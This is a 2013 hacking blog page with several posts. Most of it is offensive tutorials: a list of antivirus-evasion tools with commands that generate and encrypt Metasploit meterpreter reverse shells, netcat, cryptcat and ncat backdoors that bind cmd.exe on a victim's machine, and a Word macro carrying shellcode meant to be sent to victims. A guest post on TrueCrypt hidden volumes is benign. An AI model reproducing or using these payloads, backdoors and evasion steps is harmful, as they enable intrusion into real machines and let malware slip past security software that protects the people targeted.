Wednesday, October 30, 2013

List of Differnet AV evasion Frameworks.

Today we are gonna talk about different AV evasion frameworks for metasploit payload & how to use them? It`s very imporatant when you know which AV you have to bypass, because we don`t have to worry about FUD. Some payload can bypass specific AV ; while other AV can not be bypassed using that payload.

(1)Veil:-


Veil is python based tool which create FUD payload , One of the best framework for AV evasion. On the 15th of every month, at least one new payload module will be released.

Click here for how to install & use Veil?

(2)AV0id :-


Anti-Virus Bypass Metasploit Payload Generator Script.

wget https://github.com/nccgroup/metasploitavevasion/archive/master.zip
unzip master.zip
cd metasploitavevasion-master/
./avoid.sh

Antivirus Evasion


If you are using other interface than eth , then you have to change in script avoid.sh . For exmaple ; i am using ppp0 interface ,so open avoid.sh file & replace line 150 which is IP=$(ifconfig "$IPINT" |grep "inet adr:" |cut -d ":" -f 2 |awk '{ print $1 }') with IP=$(ifconfig ppp0 | awk '/inet addr/ {split ($2,A,":"); print A[2]}').

AV-Reports-For-payload


Click here for original author`s blog.

(3)Syringe:-


wget https://syringe-antivirus-bypass.googlecode.com/files/syringe%200.1.tar
tar xf syringe\ 0.1.tar
./syringe.sh

Antivirus-Evasion-Using-Syringe

As mention previously , change interface type in script if you are not using eth. Replace line 10 which is export interface=eth0 to export interface=ppp0.

AV-Reports-For-syringe-payload 

(4)Shellcodeexec:-


git clone https://github.com/inquisb/shellcodeexec

we are gonna use downloaded shellcodexec in third step on victim machine.

(1)msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.56.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX

(2)msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.56.1 E

(3)C:\WINDOWS\Temp>shellcodeexec.exe <msfencode's alphanumeric-encoded payload>

shellcodeexex-AV-report

Click here for detail tutorial on  how to use shellcodeexec?

(5)Hypersion:-


Hyperion is a runtime encrypter for 32-bit portable executables.

wget http://nullsecurity.net/tools/binary/Hyperion-1.0.zip
unzip Hyperion-1.0.zip
cd Hyperion-1.0
wine /root/.wine/drive_c/MinGW/bin/g++.exe ./Src/Crypter/*.cpp -o crypter.exe

Now generate metasploit payload.

hyperion-payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.128 LPORT=443 -f exe >payload.exe
wine crypter.exe payload.exe encrypted_payload.exe

AV-report-for-hyperion-payload 

(6)Crypter.py:-


Download it from below link .
http://home.base.be/%72%68%69%6e%63%6b%78%74/script.zip
unzip  script.zip
python crypter.py

crypter.py

If you get error while running then change path of structure.c in line 45 & save it , run again.

AV-report-for-crypter.py-payload

(7)Brute-force AV Evasion :-


Genpayloads.py is script to generate lots of payloads , then scan folder for specific after that you have some binary left in folder which does not detected by specific AV.

Click here for Original tutorial

wget https://raw.github.com/obscuresec/random/master/GenPayloads.py
python GenPayloads.py windows/meterpreter/reverse_tcp 192.168.1.2 443 1000 yes

(8)Finding Simple AV Signatures with PowerShell :-


Awesome tutorial here to find AV signatures & then change specific bit which trigger AV . It only works with signature-based antivirus .

(9)Powershell:-


Bypass AV using SET powershell module using Batch file

Get shell using powersploit

Deliver powershell payload using macro

(10)Get Shell Using VB script:-


Metasploit has a couple of built in methods you can use to infect Word and Excel documents with malicious Metasploit payloads. You can also use your own custom payloads as well.

For details tutorial click here

(11)Ghost Writing ASM :-


Using Metasm To Avoid Antivirus Detection. First generate metasploit payload in raw format then disassmble using metasm which come with metasploit.Add anything you want so long as you don’t break the functionality of the application.After that compile into EXE.

For tutorial click here .

(12)Different Pivoting technique to bypass AV :-


Following are framework & module which are mostly used after getting credentials. It does not flag by AV like traditional psexec.

(1)Veil-Catapult

(2)SMBExec

(3)Keimpx

(4)PTH suite

(5)Metasploit module:- powershell_psexec , psexec_psh , psexec_command

If you know other methods for AV evasion then please comment here.
at No comments:

ZERO-DAY A Future Threat, And How To Protect Your Data

ABSTRACT

It is known that practically all software has security flaws (programming problems that give individuals opportunities to explore previously nonexistent), many of these vulnerabilities not yet discovered, and hundreds are corrected every month through the packages available organizations affected, sometimes new versions and updates.


The term "zero day" (zero hour or 0day ) refers to the unknown nature of security breaches for companies , this attack tries to exploit computer application vulnerabilities that are unknown yet even by software manufacturers . Explaining in a simple and generally, there are two types of "exploit", or flaws / vulnerabilities that can be used in attacks. Those found by security companies and found by hackers whose purpose is exploration.

The issue is that some hackers choose to disclose newly discovered failures to apply the necessary corrections are sometimes rewarded for it with prizes. The "black hats" prefer to save for their own benefit ne a future attack or to share with attackers before the developer of software knows about the vulnerability.

HISTORY ALGORITHM AES

Regarding PRIVACY is important to know how to control the availability and exposure of your data , the AES algorithm was proposed to replace DES, NIST ("National Institute of Standards and Technology U.S.") held a competition (The selection process began in 1997 and ended in 2000 with the victory of the Rijndael algorithm written by Joan Daemen and Vincent Rijmen) for it to be made an algorithm that would be called "Advanced Encryption Standard " that meets the following specifications: algorithm publicly defined;

Being a symmetric cipher block; Designed for the key size can be increased; Deployable in both hardware and software; Powered freely, this algorithm Encrypt and Decrypt using an encrypted key and blocks, both sizes of 128,192 or 256 bits.

I will cite and explain how an open source tool very important: TrueCrypt (encryption on-the-fly OTFE) to confidential files , folders and entire drives on your PC , encryption, it can create a virtual encrypted disk or encrypt a partition , individual algorithms supported by TrueCrypt are AES, Serpent and Twofish, additionally , five different combinations of cascaded algorithms are available : AES-Twofish, AES-Twofish-Serpent, Serpent-AES, Serpent-Twofish-AES and Twofish-Serpent. Uses RIPEMD-160, SHA-512 and Whirlpool as hashing functions.

SOLUTION

Due to the increasing amount of 0day discovered, I will present one of the safest techniques to protect the security of your data, first we store our data in a nonvolatile memory device (eg USB stick or external HD, is the storage, where once recorded, the data are not lost when you remove the power source), we will also create a volume HIDDEN, at worst it can happen that you are forced by somebody to reveal the password to an encrypted volume . There are situations where you cannot refuse to reveal the password, for example, due to extortion. The method is to use a volume "HIDDEN" that allows you to solve such situations without revealing the password to your volume true, we actually create two passwords, a password can be used for volume "False" and one for the volume "True".

In case of any extortion can provide the password "Fake" where the attacker will have access, and the information contained in this folder will be irrelevant.

STEP BY STEP

Choose the "Create Volume".


Step1.


Select "Create an encrypted file container" then click "Next".

Step2.

Select "Hidden TrueCrypt volume" and click "Next".

Step3.

Then we select this option, the wizard will first help you create a normal volume and then a TrueCrypt hidden volume within it.

Select “Normal mode” and click “Next”.

Step4.


Choose a name for the file and click "Save".

Step5.

Select the location of the outer volume to be created (within this volume will be a hidden, that will be created later).Go straight on "Next”.

Step6.

Again click "Next".

Step7.

Select the type of encryption algorithm you want to use:

Step8.


Enter the volume size and click "Next".

Step9.


Choose a password, the more characters better, example: p@ssword.

Step10.

Select the "Format" and click.

Step11.


Now wait for the formatting, you can move the mouse quickly to generate a better randomness.

Step12.


Let's create the next volume, click "Next".

Step13.


We will continue to do our hidden volume, again click "Next".

Step14.


Select the encryption mode you want to apply to your new volume.

Step15.


Enter the size of another volume.

Step16.


Choose a secure password and different from the first, with many characters and click "Next".

Step17.


Ready! Now the volumes are made, and beyond the expected, you have a hidden volume and secret to save your important data.

Step18.


Just click on "Exit".

Step19.


So let's understand how the volume created within the other, known as External.
Let's open Truecrypt and then first open the main volume, choose FILE SELECT, and we select the volume created.

Step20.


Click to open.


Step21.


Click on "Mount".

Step22.


This screen will ask for the password, remember that you have two, the volume for false and one for true.

Step23


Choose which put password.

Step24.


Pay attention to the volume that opened was the "normal".

Step25.


You can use social engineering if you need some day.

Step26.


Click on “Dismount”.

Step27.


We will select the same item again, now to test with another password.

Step 28.

Enter the password for the hidden volume.

Step29.


Note that our hidden volume appears, note the size and type.



This article shows a technique for case one day you will be forced to disclose information, learn how to get out of this trap.

It's also a great way to protect your company's data and a security strategy that should apply to stay quiet with your important data.

About the Author
This is a guest post written by , RAFAEL FONTES SOUZA.He is the maintainer of the “Project Backtrack Team Brazilian”, He is also a member of the "French Backtrack Team" and made partnerships with groups from Indonesia and Algeria, was prepared a collection of video lessons and made available on the website.

He am Founder of the "Wikileaks and Intelligence, Cypherpunks". Good communication in groups and the general public, attended college projects with a focus on business organization, he currently seeks work experience outside of brazil”.
at No comments:

Thursday, October 24, 2013

Backdoor using Netcat, cryptcat , ncat.

Today we are gonna talk about Netcat & its alternative ; i assume that all of you are familiar with Netcat. If not than read here.  Also i assume that you have already open port 455 using following command.

netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL

Attacker `s I.P : 192.168.56.1

Victim`s I.P.     : 192.168.56.101

We will talk about Netcat, cryptcat & ncat.

(A)Netcat:-


Netcat is used as backdoor. After gaining access to machine , we are creating "netcat" as startup service using changes to the system registry . And then we are gonna open port for communication. At attacker side just start  netcat listener. Here is tutorial on how to create netcat backdoor?

But if you know about method used in that tutorial ; there are some disadvantages of using netcat.

(1)Most of AV flag netcat as hacking tool :- I know You can use crypter , but still general behavior detection  possible by AV.

netcat-virustotal


(2)Clear text communication (No encryption):-anyone from same network can view your communication.Also due to clear text communication firewall or AV can popup & block our communication.

netcat-capture-traffic-using-wireshark

(3)No authentication:- anyone can start listner to connect back to our backdoor , because there is no mechanism to verify that user are authorized or not.


(B)Cryptcat:-


Cryptcat is same as netcat but in advanced it provide encryption & authentication mechanism.

How to install cryptcat?


In case of backtrack , apt-get install cryptcat .

If you are in other linux OS , then you have to manually installed it from source ; because in repository it does not come with e option , so we can not bind any program to it.

So download source from here .

unzip it , change directory & enter following command

make unix

To make exe(windows compatible) from source , use visual studio.

root@bt:~# cryptcat -h
[v1.10]
connect to somewhere:    nc [-options] hostname port[s] [ports] ...
listen for inbound:            nc -l -p port [-options] [hostname] [port]
options:
    -e prog            program to exec after connect [dangerous!!]
    -g gateway      source-routing hop point[s], up to 8
    -G num            source-routing pointer: 4, 8, 12, ...
    -h                     this cruft
    -k secret          set the shared secret
    -i secs              delay interval for lines sent, ports scanned
    -l                      listen mode, for inbound connects
    -n                     numeric-only IP addresses, no DNS
    -o file               hex dump of traffic
    -p port             local port number
    -r                     randomize local and remote ports
    -s addr             local source address
    -u                     UDP mode
    -v                     verbose [use twice to be more verbose]
    -w secs            timeout for connects and final net reads
    -z                     zero-I/O mode [used for scanning]

Most of options are same as netcat, but look at new option as -k , it provide password for communication.

On victim machine type following command

cryptcat -Ldp 455 -e cmd.exe

On attacker side , setup listner

cryptcat 192.168.56.101 455

backdoor-using-cryptcat

Look at following figure ; where we capture traffic using wireshark ; it`s encrypted.

cryptcat-capture-traffic

You can also provide -k option for authentication.So in case of cryptcat we got authentication & encryption.

But still it detected by AV.

cryptcat virustotal
                                            Virustotal link

(3)Ncat:-


Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat.Ncat  come with nmap , so in attacker side we have already installed ncat. 

To download ncat for windwos click here.

View man page of ncat or ncat --help ; it has so many option.

For encryption & authentication you can use ssl ,ssl cert, ssl key ,ssl verify.

on victim side:-

ncat -lvp 455 --ssl -e cmd.exe --allow 192.168.56.1

I encrypt communication using ssl & only allow 192.168.56.1 ip to connect back.It`s possible to connect back using spoofing I.P.

on attacker side

ncat 192.168.56.101 445 --ssl

ncat-backdoor

And it does not detected by AV.


cryptcat virustotal


So with help of ncat , we can get around of our problems which are no-authentication, no-encryption, caught by AV.
at No comments:

Friday, October 18, 2013

Get shell Using Shellcode in Macro.

We can execute shellcode directly in macro. It`s very old method, but still it`s useful ; because AV don`t trigger it.First we will generate VB code of our payload.

msfconsole
use payload/windows/meterpreter/reverse_tcp
set LHOST 192.168.56.102
set LPORT 443
generate -t vba
exploit


Now we have generated our shellcode. Now we will create macro.

(1)Open any word or Excell document

(2)Click on view & then click on Macros.

(3)Give name to macro & create macro.


(4)Remove all things from modules windows & Paste our generated VB code.



(5)Saved it as type Word Macro-Enabled Document.


Send this file to victim. By default in MS Office  " Disable all macros with notification " option is enabled , so whenever any document try to execute Macro it will pop up security warning that macro is disable ; so to execute our shellcode using macro victim should click on Enable content.

You have to setup listener to listen reverse connection. If your IP is not available when victim open Document then document will be crash.So now we will setup listener

use exploit/multi/handler
set lhost 192.168.56.102
set lport 443
set payload windows/meterpreter/reverse_tcp
set autorunscript migrate -n explorer.exe
exploit

Here we setup migrate script as autorunscript so when document will closed our shell will not die.
at No comments: